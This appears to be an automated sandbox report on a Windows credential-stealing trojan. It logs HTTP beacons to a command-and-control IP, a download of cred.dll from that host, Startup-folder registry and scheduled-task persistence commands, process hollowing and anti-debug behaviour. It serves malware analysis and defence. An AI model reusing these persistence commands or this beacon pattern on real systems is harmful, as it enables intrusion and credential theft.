    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: Joe Sandbox ViewIP Address: 185.215.113.15 185.215.113.15
    Source: Joe Sandbox ViewIP Address: 185.215.113.15 185.215.113.15
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Jun 2022 07:46:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 31 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.15 Port 80</address></body></html>
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
    Source: unknownHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_004081B0 CreateMutexW,GetLastError,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
    Source: global trafficHTTP traffic detected: GET /Lkb2dxj3/cred.dll HTTP/1.1Host: 185.215.113.15
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00402410 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,
    Source: yIF7nMz573.exe, 00000000.00000002.271960953.0000000000E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: yIF7nMz573.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_004061E0
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00428610
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00404710
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0042B947
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0042BA67
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00428AA8
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0042DCA0
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0042CCBD
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00405D80
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0041CF57
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_004061E0
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_00428610
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_00404710
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0042B947
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0042BA67
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_00428AA8
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0042DCA0
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0042CCBD
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_00405D80
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0041CF57
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: String function: 00418910 appears 44 times
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: String function: 00416FE0 appears 119 times
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: String function: 00418910 appears 44 times
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: String function: 00416FE0 appears 119 times
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Source: yIF7nMz573.exeVirustotal: Detection: 36%
    Source: yIF7nMz573.exeReversingLabs: Detection: 46%
    Source: C:\Users\user\Desktop\yIF7nMz573.exeFile read: C:\Users\user\Desktop\yIF7nMz573.exeJump to behavior
    Source: yIF7nMz573.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\yIF7nMz573.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Users\user\Desktop\yIF7nMz573.exe "C:\Users\user\Desktop\yIF7nMz573.exe"
    Source: C:\Users\user\Desktop\yIF7nMz573.exeProcess created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe"
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    Source: C:\Users\user\Desktop\yIF7nMz573.exeProcess created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe"
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Source: C:\Users\user\Desktop\yIF7nMz573.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeFile created: C:\Users\user\AppData\Roaming\110809d565579cJump to behavior
    Source: C:\Users\user\Desktop\yIF7nMz573.exeFile created: C:\Users\user\AppData\Local\Temp\62eca45584Jump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winEXE@13/3@0/1
    Source: C:\Users\user\Desktop\yIF7nMz573.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00EA26A6 CreateToolhelp32Snapshot,Module32First,
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeMutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01
    Source: C:\Users\user\Desktop\yIF7nMz573.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: yIF7nMz573.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: 4C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdbhQE source: yIF7nMz573.exe, bguuwe.exe.0.dr
    Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: bguuwe.exe, bguuwe.exe, 0000000A.00000003.309573312.0000000002680000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 0000000A.00000002.310851152.0000000000400000.00000040.00000001.01000000.00000004.sdmp, bguuwe.exe, 00000013.00000003.436338971.0000000001010000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 00000013.00000002.437486522.0000000000400000.00000040.00000001.01000000.00000004.sdmp
    Source: Binary string: C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdb source: yIF7nMz573.exe, bguuwe.exe.0.dr

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\yIF7nMz573.exeUnpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeUnpacked PE file: 10.2.bguuwe.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeUnpacked PE file: 19.2.bguuwe.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\yIF7nMz573.exeUnpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeUnpacked PE file: 10.2.bguuwe.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeUnpacked PE file: 19.2.bguuwe.exe.400000.0.unpack .text:ER;.data:W;.sez:W;.yasufo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00418956 push ecx; ret
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00EA5D2A push ecx; iretd
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00EA4F63 push es; iretd
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_00418956 push ecx; ret
    Source: yIF7nMz573.exeStatic PE information: section name: .sez
    Source: yIF7nMz573.exeStatic PE information: section name: .yasufo
    Source: bguuwe.exe.0.drStatic PE information: section name: .sez
    Source: bguuwe.exe.0.drStatic PE information: section name: .yasufo

    Persistence and Installation Behavior

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\yIF7nMz573.exeFile created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
    Source: C:\Users\user\Desktop\yIF7nMz573.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844Thread sleep count: 154 > 30
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844Thread sleep time: -4620000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6848Thread sleep time: -50000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840Thread sleep count: 154 > 30
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840Thread sleep time: -4620000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612Thread sleep count: 142 > 30
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612Thread sleep time: -4260000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6828Thread sleep time: -390000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6852Thread sleep time: -240000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6840Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6844Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe TID: 6612Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\yIF7nMz573.exeAPI coverage: 6.2 %
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeAPI coverage: 7.1 %
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_004051C0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_004244D2 FindFirstFileExW,
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_004244D2 FindFirstFileExW,
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 30000
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 50000
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 30000
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 30000
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 30000
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 60000
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 30000
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 30000
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeThread delayed: delay time: 30000
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00425728 GetProcessHeap,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0041F362 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0041B5D1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00EA1F83 push dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0041F362 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0041B5D1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0041889C SetUnhandledExceptionFilter,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00417E33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_0041DED6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_00418737 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0041889C SetUnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_00417E33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_0041DED6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00403440 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeProcess created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe"
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Roaming\110809d565579c\cred.dll VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Roaming\110809d565579c\cred.dll VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeQueries volume information: C:\Users\user\AppData\Local\Temp\425620883392 VolumeInformation
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00418557 cpuid
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00418971 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00427B81 _free,_free,_free,GetTimeZoneInformation,_free,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_004051C0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics,
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_00413860 Sleep,IsUserAnAdmin,GetUserNameW,GetComputerNameExW,

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
